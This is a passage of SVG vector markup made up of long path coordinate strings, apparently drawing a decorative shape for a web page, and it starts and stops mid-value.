4.4-1.2-4.6-1.7,1.4.3,3.9.8,5.4,1.1,1.1-.4-1.9-1.6-.8-1.8a9.18,9.18,0,0,1,2.2.6c1.3,1-3.2,1.5,2.3,2.8-1.9-1.1,3.1-1.3-.4-2.8,5.8,1-2.5-1.9,4.4-1.1-5.2-2-2-3.5,2.2-3.6a12.82,12.82,0,0,0,2.1.5,4.69,4.69,0,0,0-2.4-1.1c-.1.1-.2.2-2-.1-.4-.8,1-.8.3-1.4,1.6.3,2.7.6,4.3.9-1.7-1,3.2-.1,1.4-1.1-2.9-.4-2.8-.1-5.2-.9,3,.5,2.5.1,4,.2-1.7-.5-4.3-.5-5.3-1.1.4-.6-.8-.8-1.8-1.7,4.1.7,3.6-.1,7.2.9.3-.6,2.8-.4-1.7-1.5,3.3.7,4,.4,7.4,1.3.1-.2-1.3-.5-1.3-.7-2.3-.3-5.6-.7-6.4-1.2,1.3-.8,3.8-1.5,1.7-2.7a15.78,15.78,0,0,0-2.4-1c1.8.3,3.3.6,4.3.8l-.3-.6q-4.05-.6-3.3-.9c4.5,1,1.9.1,6.2.8,2.1.7.6.8-.9.9a4.82,4.82,0,0,0-1.5.3c5.8,1.2,4.4,2.3,1.6,2.1,5.9.5,5.3-1.2,3.4-1.9a22.29,22.29,0,0,1,2.7-.2c1.7-.1,3.3-.3,3.6-.8a9.76,9.76,0,0,1-3.3-.9c-3.2-.6-3-.3-6.2-.9-1.3.2,3,.7,2.4,1-5.1-1-2.4.1-7.2-.9.6-.4,4.9-.4-.7-1.6l-.3-.6c1.4.3,3.9.8,5.4,1.1.2-.6-5.5-.8-5.5-1.5,1.7.1,4.3.5.8-.3,3.4.2,5.8,1.2,7.4,1.2-1.7-.3-2.1-1.1-.4-.8a24.16,24.16,0,0,1,4.3.9c-5.4-1.1.8.8.5,1.1-1.5-.1-4.2-.6-5.1-.5,5.1.9.8.7.4.8,6.7,1,5.1.1,5.8,0,3.3.5.9.5,4.5,1.3-1.1-.6-4.2-1.6.5-1-2.7-.5.7-.7-4.5-1.3-1.3.1,3.1,1.1.3.7-4.9-1.3.3-.7,1.5-.9-3.5-.7-.6.3-4.1-.5,0-.1-.9-.3-1.2-.4-.6-.7,1.7-.4,4.7-.3-.8-.4-1.6-.1-3.1-.4,0-.2-.6-.3-1.2-.5a17.85,17.85,0,0,1,4,.3c2.7.4,1,.6,4.4,1.1-1-.6-1.4-.8.6-.8-1-.4-4.6-1-4.5-1.3s2.7.2,2.9,0c-1.6-.4-3.1-1.4-.7-1.4-2.1-.5-2.9-.9-4.5-1.3-.8.4,1.7,1.1-1.6.7a13,13,0,0,0-2.3-.7c0,.3,1.8.6,2.4,1-6.5-1.2-.5.6-2.8.3-1.4-.3-2.1-.5-4.2-.8,3,1.1,4.8,2.4-1.1,1.8,6.1.9,1.9,1.5-2.8.2.3.6,3.1.7,4.5,1.3-2-.3-2.5-.2-5.1-.6-5.9-2-1.8-1.9,2.9-2.1-3.3-1.3-1.1-1.2-2.8-1.9,1.1.2,2.1.3,3.1.5-2.9-.6-1.5-1.5-4.7-1.7,2.7.7,1.1,1.1-1.6.7-1.1-.9,1.2-.9.2-1.8a19.5,19.5,0,0,0,5.1.6c-6.1-1-4.5-1.5-1.3-.8-1.3-1.2,3.1-1.5-.6-3.3,4.1.5,4.1-.2,1.5-1,1.4.2,2.3.4,3.2.6-1.4-.7.9-.4,2.8-.2-3-.9-3.6-.2-5.2-.8a7.88,7.88,0,0,1,3.8-.1c0-.8-3.4-3,.5-3-3.6-1.3-4.9-5.3,1.6-2.7.7-.7-1.2-1.9-1.1-2.4.6.7.6-.1,4.2.7-1.1-.5-1.5-.6.8-.4-4.9-.9,1.4-.5-2.6-1.4,0,.1-.8,0-1.1-.2,2.8.4,2.6.3,6.2.8,2.8.7.8.5,2.5,1.2,3.6.4,3.5.7,6.4,1.3-2.3-1.8-.8-1.4.9-2.3-3.9-.7-1,.4-3.9-.1l-.3-.6c-2-.3-3.5-.5-4.1-.5,3.9.6-.5.3,3.4,1-.8,0-.6.3-4-.3-.3-.3.8-.4-2.3-.8.9.4,1.8.8-.7.5-3.9-1.3.7-1.9-3.6-3.5a4.17,4.17,0,0,0,2.6-.4c2.1.1,4.2.1,6.1.3a9,9,0,0,1,2-.2,3.87,3.87,0,0,0,1.9.3,4.17,4.17,0,0,1-1.1-.3h2.3c-.5.3,1.4.4,1.5.7,6.9.4,16.6.6,21.8,1.2.4-.4-5.3-.5-2.6-.7,2.8.1,2.5.4,5.5.4.6.2.7.5,3.5.5-1.6-.3,2.5-.4-.3-.4h1.3c.2.1.5.1.7.2-.2-.1-.3-.1-.4-.2,1.8-.1,3-.2,5.5-.2.4.4,2.2.6,4.1.7a19.51,19.51,0,0,0,5.5-.3c4.4.2,5.8.5,10.1,1-4.4.3-6.2-.1-10.6-.2-2,.8,13.9.9,10.8.4,2.7.2,2.1.4,1.5.7,3.4,0,1.7.4,4.5.4-.5-.3,0-.4,1.8-.4,1.2.2,1.3.4,2.5.6,7.5,0,9.1.2,18.1.4a16.36,16.36,0,0,1,3.8-.6,42.76,42.76,0,0,0,6.5.2c0,.2.5.3,1.3.5,4.5.2,4-.1,7.3-.1.1.3,1.1.7-.5.9,2,0,2.4.2,4.3.2,1.2-.3-3.5-.7-.5-.8s4,.5,2.5.6c6.2.3,12.7,1.9,18.4.9.4.2,1.7.2,1.4.5,4.7-.1,5.6.1,8.3-.2.4.2,1.9.2,2.3.4,1.1.3-1.3.3-.7.5,7.8.7,22.3.4,14.2-.8a38.38,38.38,0,0,1,6.6.5c-.9.4-2.6.7-2.4,1.2-5.2.3-11.2.6-17.1.6h0a109.94,109.94,0,0,1-14.5-.9c-3.6-.5-.9-.8-7.1-1.1.7.5,2,.7-.4,1,8.7,0,2.4,1.4,6.5,1.9-1.1.1-4.3,0-4,.4.8.2,2.5.4,3.6.6-3,.4.2,1.1-.8,2.1a14.87,14.87,0,0,1-2.2-.2c2.9,1.2-2.9,2.2,4.3,3.4-.4.4-3.2.6-2.4,1.2-3.3-.1-5,0-7.3.1,13.3,1.8,42.6,1.7,42.7-.4,8-.9,11.9-2.1,10.1-3.7,3.1-.1,3.7.2,6.3,0-1.4-.8,1.1-1.2,5.4-1.4-3.2-.1.9-.2-.3-.4-1.6.1-3.9.3-8.2.4,0-1.2-7-1.7-3.8-2.6,9.3.5,12.6,1.4,24.2,1.7,3.1,0,2.5-.5,7.1-.4,0-.2-.5-.3-1.3-.5a38.13,38.13,0,0,0,4-.2c2.9-.3,2.3-.9.3-1.6a.42.42,0,0,1-.2-.1h.34c3.4,0,4.8.1,4.8-.2,3.4-.1,1,.4,4.4.3a8.21,8.21,0,0,1,2.1-.1c-.1-.2-.5-.3-1.4-.5,8.5-.2,8.5-2.7,21.2-1.2,0,.3,1.3.8-.4,1,6.4.3.9.9,5.1,1.4-.3-.8,2.5-1-2.1-1.6,6.7.3,7.9-.3,10.7.3.7-.5,1.7-.7,3.6-.9,1.1.3,2.6-.1,5.3.1-.8.5,2.4.7,4.8,1-4.2.1-5,.6-5.5,1.2a13.54,13.54,0,0,1,3.3.2c-2.2.2-3.7.5-2.5,1,5.3,0,7.9.4,11.7.2,2.8.9,10.5.4,15.4.9-2-.5,2-1-3.1-1.4,3.1-.2,6.4-.3,8-.6-8.6-.2-4-1.4,1.2-1.4-1.4-.4-3.3-.7-4.9-1.1,1.1,0,1.2-.1,2-.1,4.3.2,5.4.6,5.8.9-.3-.2.9-.2,3-.2-.7-.3-3-.8.6-.8,1.6.3.1.8,2.6.7-2.5-.6,3.7.2,6.2-.2,2.7.3.4.7.6,1,2.8.2,3.3,0,4.3.2-.5,1.1,2.1,1.9,1.7,2.5.7-.4,5.2.1,5.5.4-4.3,0,1.5.6-1.6.7-2.7-.3-1.9-.4-1.6-.8-3.3-.2-3.6,0-6.5-.2-1.4.4,4.6.1,4.5.4s.7.4-.8.4c-1.7,0-1-.3-3.3-.3.3.5-1.8.5-6.1.3-.2.3-.8.2-2.8.5,2,.1,2.3-.1,4.2,0,1.2.2,1.3.4,2.5.6-1.8-.3-6.3.2-2.8.5l3-.3c.5.6-4.6.6-1.4,1.1.2-.1,2.2-.1,3-.2-2,.2.1.7,2.6.8-.5-.3-2.6-.5.7-.5,2.6.6,12.9.1,7.1-.3,1,.9-9.5-.2-2,.2.7-.3-3.6-.2-3.5-.5,11.5,0,5.9.8,13.4,1.3-2.1-.3-3.3-.7-.6-.9,9.6.1,15.1-.6,15.7-1.3h.3c.8.3,4.2.3,6.6.5-.6-.5,2.1-.4,7.1-.4-2.2-.4-2.7-.5-.5-.8-1.5-.2-5.2-.2-5.5-.4.5-.3,1.5-.8,5-.4-1.6-.5.8-1-5-1.3a15.32,15.32,0,0,1-1.9.3c-.1-.1-.1-.2-.2-.3-7.8.5-16.3-1.3-8.3-1.5-.1.1.4.8,1.3.5q-1.2-.45,3-.3c-1.6.1.8.5,3.6.6-1.4-.5,1.3-.5,2.7-.6-5-.6-3.1-1.6-7.9-2.5a27.31,27.31,0,0,0,3-.2c.2.2.1.4,2.4.4.6-.6-3.6-.8-4-1.3,3.2,0,4.4-.3-.1-.2-1-.5-.2-.8,4.9-.6a24.64,24.64,0,0,0,3.7.8c.6-.3,3.2-.3,3.8-.6,1.8,0,.8.3,2.3.4,2.5-.3-.1-.4-2.3-.6a9.16,9.16,0,0,0-2.6-.4c-.1-.1-.2-.3-.3-.4,1.6,0,3.9.1,4.2,0-4.1-.1-5.7-.2-7.6-.4-.5-.3,3-.1,3-.3-1.3,0-1.3-.2-1.3-.4-2.5-.1-6.9-.6-6.3,0,2.5.2,3.8-.2,4.2.1.7.4-2.5.3-4,.4-2.9-.3.4-1-.9-1.3,0,.2-2.6.1-2.2-.2,3.2,0,3.3.3,6.4.2.6-.5-2.2-.7-2.8-1,1.4,0,1.4-.1,3.1,0,1.8.4-4.4-1.2-6.3-1.7h.4c2.4.3,1.8.5,3.3.8,2.1-.1,1.1-.4.1-.7,1.6.1,3.6.2,4.9.4,1.1.3-2.8.5.5.8-.4-.4,1.1-.6,3-.7.4.1.8.1,1.1.2,1.3.3,5.2.2,7.4.6-.8.2-7.4.7-4.8.7a8.21,8.21,0,0,1,2.1-.1c.1.1.1.1.1.2-.4,0-.7.1-.6.1h.5a3.36,3.36,0,0,1-.6.3c-.7-.1-1.5-.1-2.6-.2,1.7.7-4,.9.2,1.7h2.3a4,4,0,0,1,.5.1c0,.1.1.1.1.2-1.3.1-1.1-.1-3.7-.1-.7.3,1.8.3,3.9.3.9.7,2.7,1.3-1.4,1.6,4.5.4,2,1.2,7,1.6,0-.3.4-.6.4-.9.8-.1,1.5-.1,2.3-.2h-2.4c-.1-.2-.4-.3-1-.5a16.21,16.21,0,0,0,2.2-.2,8.1,8.1,0,0,0,2.2,0,2.08,2.08,0,0,1,.7.1c0-.2,2.5-.2,5.2-.1,1.2-.5.7-1.1,3-1.8-3.8-.1-1.8.5-6.1.3-.2-.1-.2-.1-.1-.1h.4a5.6,5.6,0,0,0,.7-.2,3.88,3.88,0,0,0,.9-.1h-.7a3.25,3.25,0,0,0-1.3-.3,23.14,23.14,0,0,1,3,.2c.3-.3,3-.8.3-1.1.1.3-1.7.3-2.8.5-7-1.2,7.3-1.1,12-1a11.71,11.71,0,0,1,3.8-.6c4.6.1,1.8.9,6.9.9,1.2-.2-4.4-.4-1.3-.5a12.28,12.28,0,0,0,2.9.2,4.76,4.76,0,0,0,.7.3h-.1c-.1.2.5.3,1.5.3.6.1,1.4.3,2.1.4-.4-.1-.5-.2-.4-.3,2.7.1,6.1.1,6.8.4-.6.1-1.9.5,1.4.6,2.9.1-1.4-.6,2.9-.4,1.8,0,.8.3,2.4.4.7-.3,2.8.2,5.3.1.2-.3-.8-.7,3.8-.7-5.8-.1-3.6-.4-7.5-.2a15.33,15.33,0,0,1,5.1-.2c-1.2-1.1,1.3-1.8-.8-2.7,3.2-.1,4.3-.4,8.1-.4,2.5,0,1.6.3,2.8.5-.4.1-.6.1-.9.2a3.7,3.7,0,0,1,1.1-.1h.5a12.27,12.27,0,0,1,2.1,0,2,2,0,0,1,.9-.2c1.5,0,3.3,0,5.4.2-3.6-.3-2.1-.4-1-.6-1.2.5,4.7.4,5.3,1a16.09,16.09,0,0,0-2.5.1,12.35,12.35,0,0,0-1.7-.3c1.2.5-5.7.7-1.9,1a24.26,24.26,0,0,0,3.3-.2,9.78,9.78,0,0,0,1.3.3c3.1-.3,0-.9,4.7-.9-.3.3-.1.8,3.8,1-.3-.6,3.4-.7,5.6-1,.9.2-5.2,1.5-.9,1.8,1.9-.7,6-.9,12-1,1.3-.3-3.3-.6-.4-.7-.4.5,5.4-.2,1.8-.4.3.3-5.3.1-5.4-.2a45.71,45.71,0,0,0,7.4,0c-.3-.8-1.3-1.4-4.4-1.9.7.3-1.5.4-.1.6.1,0,.1.1.2.1-4.1.2-7.2,0-9.8.4-1-.5-.1-.5-2.6-.8,2.3,0,3.6.4,3.1,0-5-.4-2.8-1,.2-1.3a31.61,31.61,0,0,1-5.2-1.7h1.3a3.54,3.54,0,0,1-1.2-.7,21.48,21.48,0,0,1,3.4-.2c-.1-.2-.7-.3-1.3-.4-1.2-.4-.4.1-2.2.1a.68.68,0,0,1,.5-.4c1.5-.1,2.7-.2,1.3-.3a.87.87,0,0,1-.5-.1,53,53,0,0,1,5.4-1.3c-6.7-.2-4.6.5-9.1.5-.2-.1-.5-.2-.7-.3,1.9-.1,1.8-.3,1.1-.7,4.8.1,5.9-.1,8.2-.1-9.7-.7-4.3-1.6-1.9-2.1a21.47,21.47,0,0,1,3,.3c1.3-.6.9-.9-2.2-1.2.2,0,.3-.1.5-.1,1,.1,2.4.1,3.8.1-1.3.1-2.6.5.9.6-.5-.3,4.1,0,2.9-.4-.3-.1-1.2-.1-2.1-.2a9.89,9.89,0,0,1,2.3.2c.1.6,3.1,1-.2,1.3-2.3-.1-1.1-.3-3.1-.4l.4.4c1.7.1,2.7.1,3.5.1-.4.2-2,.3-4.9.1.3.3,4.8.9,5.5.4-5.2-.3,1.6-.1,2-.2-1.8,0-1.1-.2-1.2-.3a20.13,20.13,0,0,1,2.2.1c-1.5-.4-1.8-.8-1.6-1.1a23.62,23.62,0,0,1,4.2.4c-.2.1-.3.3-.4.4a15,15,0,0,0-2.5.2h2.7c.1,0,.2.1.3.1-.2,0-.2-.1-.3-.1,2.5,0,2.8.2.5.2,5,.1.8.5,4.5.5,2-.5-3.3-.7-.7-1.1,4.8.7,2.1,1.4,10.7,1.9.3.4.2.6-.2.8h-.2a10.52,10.52,0,0,0-2.9,1.5c3.6.1,5.4,0,5.3-.3-3.3-.1-1.8-.4-1.1-.7.8.2.7.6,1.4.7,4.3.2,3-.3,7.3-.1-.6-.2-2.7-.6.4-.6.1.1.3.1.7.2,1.2.5-.8.9,1.6,1.4,1.4-.2,4.1.5,5.7.7a12.27,12.27,0,0,1,2.1,0c.3-.2,2.1-.3,2.8-.5,1.7.5,2.4-.1,5.2,0,1.8.1.1.5,3.5.5.9-.2,3.1-.8-.6-.9-.1.6-7.2-.1-9.7-.4,5.2-.2-.3-1.2,7.6-1.3-1.5-.1-3.3-.2-4.5-.4,1.5-.5,2.8-.8,8.2-.4-.4-.3,1.4-.3,2.9-.4,1.2.2,1.7.9-1.5.8.3.3,2.2.4.4.6,2,.2,4.4.4,6.7.6-1.8.5,2,.6.7,1,1.9,0,3.8.1,5.7.1.4.2-1.8.2-2.6.3,2.1.3,4.1-.1,5.8.2.6.5-.5.3-2.7,0-.7.4,7,.4,6.2.8-9-.3,1.2.6-5.1.5a11.33,11.33,0,0,1,2.6.3v.1c-.1,0-.2.1-.4.1h-1.7c1.8.5-2.8.2-1.8.5a26.2,26.2,0,0,0,2.8.1c1.9.1,2.1,0,2-.1.5,0,1-.1,1.3-.1a6.42,6.42,0,0,1-1.8-.2.3.3,0,0,0,.2-.1c.4,0,.9.1,1.5.1h.1c.7.1,2.3.1,2.7.2,3.5,0,7.9,0,9.5-.2-9.3-.2,1.1-.3-3.4-.7a13.45,13.45,0,0,0,4.2,0c-3.2,0-1.9-.4-4.5-.4-.4.2-.1.5-3.9.3-1.3-.5-1.1-.9,0-1.2a50.79,50.79,0,0,1,7.8.2c-.5-.3.1-.5,2.9-.4.1-.2-1.4-.3-1.4-.5h4.2c.9.4,5.3.5,10,.9a7.88,7.88,0,0,1,2-.1c-3.2-.5,3.2-.4-1.6-.8a73.05,73.05,0,0,1,8.5.2c-1.3.1-1.1.4,1.4.5-.6-.4-1-.8-5-1.2a8.17,8.17,0,0,0,1.3-.2c1.6.1,3.4.1,4.9.2-.2.3,3,.2,2.5.6-.6,0-1.1.1.1.1,0-.1.1-.1,1-.1.3.1.2.2,1.2.2-1-.4,1.6-.3.6-.6-2,0-3.4-.1-4.6-.2,2.2,0,3.8,0,3.4-.2h-4.2c1.5-.2,1.2-.4-.6-.7,4.3.2,2.4-.6,6.2-.2.8-.4-4.8-.2-4.5-.5a7.35,7.35,0,0,0,2.4-.5h.5a8.34,8.34,0,0,1,1.8-.2c1.6,0,3.5,0,3.5-.2a21.47,21.47,0,0,1-3-.3c.4.2.3.3-.4.3a13.35,13.35,0,0,1-2,0h0c.1-.2,0-.5-.4-.7.8,0,1.7.1,2.5.1,5.8.2,10.1.4,8,1-7.2.1-3.4.6-1.7,1.3-1.9,0-3.1-.1-4.3-.2-.3.2-3.5,1.1,2.5,1.3,3.1.1-2.1-.3-.5-.6,4.6.2,1.6-.3,5.4-.2,2.3,1-.5,1.1-7.4,1,.5.7-1,1.1-2.1,1.8-.5.3-.9.6-1,1.1h.9c2.7.1,4.2-.2,4.8.1-2.2.3,1.1.5.9,1a12.82,12.82,0,0,0-4.1,0c5.1.5-4.5.4,3.4.7a34.87,34.87,0,0,1-5,.3h-1.7c.5,0,1.1.1,1.7.1,1.9.1,4.1.2,5.5.3.7.3.2.4-.9.5,2,.2,5.3.2,7.3.4-1.5-.5,2.6-.4,5.2-.4.6-.3-1.6-.4-2-.5.1,0,.2-.1.3-.1,1.8,0,3.6.1,5.4.1,1,.4-3,.4,1.9.6,5.1-.3-10.1-1-4.2-1.6-.6.6,3.8.2,6,.5-1.3-.7,12.9-1.8,13.5-.5,4.8.2,5-.1,5.3-.3-3.6,0-5.1-.2-4.6-.4-2.5-.1-8.2-.1-8.6-.3.9-.3,2.1-.6-2.2-.9,6-1.7.7-3.9,1.8-5.9,1.4.5,1.4.5.8.9,8.2.2,3.8.7,4.9.8,1.1-.3,1.7.4,4.3.1,1.6.9-.8,1.5,6.1,2.2-.5-.9,9.1.5,8.3,0-8.8-.6-7.4-1.3-3-1.8-1.7-.1-4-.1-4.4-.2,4.9-.2,5.3.5,7.7.8a45.25,45.25,0,0,0,4.6-1.1c2.2.1,4.6.3,4.6.5-1.1.4-2.8.2-.7.7-1.9,0-3.1-.1-4.3-.2-.1.3,3.5.4,3.4.7-2.4-.1-4.7-.1-7.1-.2a60.26,60.26,0,0,1,11.1,1.6c2-.7,13.6-1.2,8.1-1.9,2.4,0,8.4-.1,9.8.1-3,.4-4.4.3-.5,1-1.8,0-2.1-.2-4.4-.2.7.9-9.7.2-8.8,1.1,2.5.2,6.1.4,7.6.7.7-.3,6.6.1,7.2.3-2.7.1-3.5.3,1.6.3-3.1.4-.1,1.3-5.7,1.4-3.3-.1-4.3-.3-8.6-.3-4.3-.7-2.4-1.6-3.5-2.4-2.6,0-4.7,0-5.5.1,3.1,0,4.6.2,4.5.4-3.2,0-3.7,0-7.1-.2.5.3.8.5-2.3.5l-.4-.4c-7.1-.2-9.4.6-7.5.9a31.43,31.43,0,0,1,4-.2c.5.2,2.5.2,3.1.4-.8.4-4.8,0-6.8.2,4,.3-3.2,0-2.6.2,2.1.1,4.6.3,4.6.5-2.1,0-5.3-.2-5.6,0,11.8,1.3-6.6,1.6,4.1,3a30.21,30.21,0,0,0-5.2.4c5.3.1,7.7-.1,12.5,0-.7-.5-2.3-1.5,4.1-1.7.5.2,3.7.8-.6.9,2.1.1,5.2.1,5.8.2-2.2,1.1,5.1,2.9.6,3.8.2-.2,6.2.1,6.9-.1-5.9-.5-4.6-1.1.2-1.3-5.2-.8-3.5-2-5.2-2.7,7.9.1,8.8-.8,14.8-.5.6-.3-2.6-.9.5-1,.6.3,4.8.4,6.2.7,1-.2,2.9-.4,2-.8,3.6.1,4.6.3,5.6,0-1.1-.9-3.9-2,4.6-2.7,8.2.3,4,1,6.8,1.5,2.4-.4.1.5,3.2.5,0-.3,8.6-.1,9.9.2-1,.2-3.1.3-8.2.1.4.3.8.6,4.7.7-3.1-.7,7.4.1,6.8-.2-2.1-.1-3.6-.3-4.5-.4,8.3.2.3-.6-2.1-.8,4-.2-6.2-1.7,2.4-2,2,.4,3.5.7,2.2.9,5.9.2,9,.6,10.7,1.1-2.7.2-2.8-.1-5.8-.2.9.3,9.2.9,2.3,1a17.36,17.36,0,0,0-4.6-.5c4.6.7,13.6,1.5,14.3,2.1a52.3,52.3,0,0,0,5.6,0c3.1,1.1,11.6,2.3,3.7,2.6,1.2.4-.9,1,2.5,1.3.9-.4,7.8-.2,6.5-.5,2.2.4,5.5.8,9.3,1.1-4.1,0-.6.8-3.4.9-3.8,0,.5-.5-3.2-.5-8.7.9.3,3.1-7.5,4.1-4.3-.3,3.2-.9-3.8-1.2-3,.3-.9.9-4.3,1.4-5.2,0-6.4-.3-6.2-.7,8.4.2,2.8-1.4,13.3-.7-3.7-.6-4.9-1.3.1-1.5-.8-.2-5.6-.2-4.7-.5a33.79,33.79,0,0,1,4.5.3c-6.7-.7-2.8-2.7-10.1-3.6,2.6,0,4.7,0,5.5-.1-3.4-.1-4.1-.5-7.5-.6,1.9.4-2.7.3-3.8.5,2.1.1,5.3.7,2,.7s-1.9-.4-4.6-.4c-.3.1.2.2-1.2.2a4,4,0,0,0-1.6-.3c0,.5,9.4,1.3,2.7,1.5,1.1-.4-5-.3-6.1-.6,2.9-.4-2.6-1.4-4.2-1.6,2.1.7-7.4.4-9.1.8-2.4-.5,3.7-.1,2.4-.5a97.88,97.88,0,0,0-13.7.2c.7-.3-3.1-.3-4.5-.4-2,.2.6.9-6.6.4-.2.3,2.3.9-2.1.8-3.1-.3-.3-.9-6.5-1,18.3,2.3-19.2,2.2-5.9,4.3-6.7-.3-6.1.1-8.1.3-5.3-.3-9.4-.7-13.5-1.1,2.5-.2-.1-.3-.5-.6,2.2-.3,5.6.2,5.4-.2a52.3,52.3,0,0,0-5.6,0c-1.2-.5.7-.6,1.6-1.4-5-.3-5.1-.6-10.2-.6,2.6.8-2.7,1,4.4,1.8-3.1-.3-14.6,0-6.6.4.1-.2-.9-.4,1-.4,2.1.1,5.2.1,5.8.2-1,.4,5,.9-2.1.7,1.7-.1,1.5-.4-1.8-.5.2.4-2.6-.1-4,.2,4,.4,5.1,1.3,1.3,1.4-1.4,0-2.8-.1-4.3-.1,2.5-.4-10-1-3.3-.6-3.1.7,9.5,1.4,13.9,1.6.9.3-5.2,0-5.4.2,6.5.2,7,.7,10.7,1.1-.8-.2,4.9-.3,5.6,0-2.3.6,1.7,2-3.4,2.4-2.6-.2-4.7-.5-5.7-.1,9.8.3-1.9.9,2.5,1.3,4.9.2,1.4-.4,6.8-.2-.9.5,6.7.5,7.8.9-4.8.3-2.5,1.8.6,2.3,4.7-.1-2.1-.7,3.6-.7,3,.3,8.9.3,11.6.6-1.6.2,1.3.8,3.7,1.1a11.3,11.3,0,0,1,5.6,0c2-.9-3.5-1.5-2.2-2.4a55.5,55.5,0,0,1-5.9-.4c2.4,0-.6-.5,2.4-.5,5,.1,2.3.7,7.7.8.8-.3-5.6-1.4,1.8-1.2-.2-.2-.3-.4-.5-.6-9.9-.2-5.9-1.5,2-.9.9-.5-2.2-1.4,5.9-1.2-2.6.6-1.5,1.2,3,1.8.4-.2,3.9-.1,2.3-.5a19.43,19.43,0,0,1-4.5-.4c3.3,0,.9-.5,3.8-.5a66.19,66.19,0,0,0,6.9-.1c4.6.6-.7,1.1-1.5,1.5,5.6.2.7-.6,5.1-.5,2.3.1,1.1.3,3.1.4,3.1,0-1.4-.8,2-.8,2,.3,1.6.8,6.4.9a56.21,56.21,0,0,1-6.2.8c5-.1,6.4.7,14.8,1-5.7-.7-13-1.6-3-1.8-2.2-.6-3.4-1.5,1.3-1.7a68.57,68.57,0,0,0,7.7.8c5.8-.1-4.8-1-1.1-1.2.3.1.6.3,3,.3.1-.3-3-.4-4.7-.7a50.7,50.7,0,0,1,9.7,0c-4.4,1.2,1.3,2.6-6.4,3.8-3.3-.9,6.9-1.6-3.4-2.3,4.2.6-3.8.6,2.3,1-2,.4-8.3.3-4.8.9-1.6-.4,3.6,0,4.2.1a5.61,5.61,0,0,0-2.1.7c7.5.2,4.3,1.1,12.3,1.4-9-1.3.3-2.2,5.8-2.9-2.4-.4-5.6.1-7.2-.3a31.43,31.43,0,0,1,4-.2c7.3.5,5.3.1,12.4,0,2.9.7-6.4.2-6.4.6,1,.3,7.4.9,5.1,1a26.88,26.88,0,0,1-3.1-.3,17.67,17.67,0,0,0-2.4.4c3.2,0,5.4.1,5.9.4-7-.1-11.7,0-12,.6a41.15,41.15,0,0,1,4.3.1c-2.9.3-2.3.9-5.9,1.2,4.8.3.3.5,3.6,1-6.5-.2,1.2,1-4.8.9,1.1,0,1.7.1,1.6.3,14,.5,3.4-1.4,11.2-1.5-.4.6,3.3.5,4.4.2,7.8,1-10,1.5-1.2,1.8-.2.3-7.2.8-3.5.8,1.9-.5,1.1-.1,7,0,2.9,0-3.7-.8.6-.9,2,.1,1.6.8,3.2.5-1.4-.5-.2-.5-3.5-.8,1.5-.1,5.2-.1,6.8-.2-1.2-.2-6.9-.1-6-.5,15.1.2,5.5-1.5,12.2-1.9,5.5,1.7,2,3,3.6,4.1a9.07,9.07,0,0,1,2.8.1l.3.3c-3.3-.1-5.4-.1-7,0,3.6.5-2.9.4-3.5.8,4,.9,2.2,3-1,3.6-.2.5,3.4,2.5-5.9,2.8,2.1.1,5.2.1,5.8.2a31.08,31.08,0,0,0-5.1,2.1c1.9.1,5.4,0,5.8.2-1.2.2-5.1.1-6.7.3,9.3.8-4.7,1.1,1.8,2,6.9,0,1.8-.4-.4-.4a3.93,3.93,0,0,1,2.3-.5c.2.5,2.2,0,4.3.1,1.8.2,1.9.3.4.4,11.2.3.2-1.1,0-1.6s10.4,0,9.1-.7a35.62,35.62,0,0,0-4,.1c-2.2-.5-5.6-1.2.1-1.4,1.2.4,6,.2,5.5-.1-3.5-.3-1.7-.4-5-.9,6.9.5.7-.6,8.3,0-.5-.6-4.2-.3-6.2-.7,5.6-.2-1.1,0-1.8-.5,2.8,0,2.5-.3,5.6,0,.6-.6-4-1.1-1.3-1.4-2-.2-4.4-.3-6-.5,1.5-.4,2.9-.8,1.5-1.5,10.8.3,8.9-1.4,16.6-1.7-1.7-.1-4-.1-4.4-.2.2-.3,8.2,0,3.8-.5-4.9-.2-1.4.4-6.8.2-1.9-.6-6.4-1.7-3.4-2.3-1.4.3,5.5.7,6.1.6-2.4-.3-6-.6-6.5-1,1.9.2,5.3.2,7.3.4,1.4-.6-2.8-1.3-1.5-1.7,1.6.1,2.3.2,3,.3,2,.8-3.9,1.9,3.6,2.5-2.8-.8,3.8-1.7-1.1-2.8,7.9.2-4.54-1.69,4.66-1.79-7-1.1-4-2.51.24-3.41V0Z\"></path>\n        <path d=\"M1739.6,46.7c-1.3-.4.4-.6,2.1-.7-4.5-.2-8.8-.4-11.7-.7A94.06,94.06,0,0,1,1739.6,46.7Z\"></path>\n        <path d=\"M1838.7,75.8c3.8-.5,1.4-.8,4.5-1.2-4.6,0-5.9,1-7.6,1.1C1836.6,75.8,1837.7,75.8,1838.7,75.8Z\"></path>\n        <path d=\"M1862.2,72.5c-2.3.1-8.6.3-5,.7C1856,72.7,1864.7,73.1,1862.2,72.5Z\"></path>\n        <path d=\"M1718.3,65.2c1.8.6.3.8,1.4,1.6,3,.2,7.5.6,7,0-1.6-.1-5.3-.3-6.2-.7,3.6-.3,3-1.2,1.2-1.8-2.2.2.3.1.4.4H1718c-3-.5-4.1-1.1-8.5-1.7-.1-.6,7.4-.1,7.6-.8-8.7-.3-7.1-.8-6.9-1.5,1.4,0,2.9.1,4.3.1-4-.5,1.6-.6-5.4-1.3h4.2c4,.3,7,2.2.1,1.7,5.1.9,9.1,1.5,4.8,2.3,2.5,0,5,.4,5.7.1-2.5-.5-3.2-1.1.1-1.4-7.8-.4-5-1.3.1-1.4,0,.3.2.5,3.3.6,4.2-.5,5.8-.7-1.3-1.4-1,.3,5,.9.9,1-2.1-.1-3.6-.3-4.5-.4,3.2-.2,1.8-.3.7-.7,6.2.2,3.5-.3,6.6-.4-3.1-.3-5.9.1-7.3-.4,1.3-.4-3.9-.9,1.8-1.2,2.3.2,2.9.5,6.2.7.4-.4-5.3-.4-4.9-.8,3.8.1,3.5-.2,3.9-.3-5.2-.7-1.8-1.5-8.8-2.2,2.6-.1,1.5-.5,3.6-.6-.2.2.7.4,3.2.5-5.6-.8,1.1-1.6-8.4-1.7-1-.5,7.9-.5,3.3-1-.3.1.1.2-1.2.2.1-.2-1.8-.3-1.8-.5,6.1,0-2.4-1.2,4.4-1.3-5.8,0-3-.5-6.2-.7-2.9.6-4.4,1.4-6.6,2-3.2-.8-2.7-1.2-3.2-2,2.4,0,6.1.8,5.8.2-9.1-.6.1-1.1-5.7-1.8-1.1.4.3,1.1-5,1.1h-2.4c1.2,0,2,.1,2.4.1.7.1.5.1,0,.1-1,.1-3.4.2-3.4.3,1.6.1,2.7.1,3.4.2,3,.3-.8.9,2.3,1.4h-2.3c-1.8,0-1.2.2,0,.4l1.6.3a7.82,7.82,0,0,1-1.6-.1c-4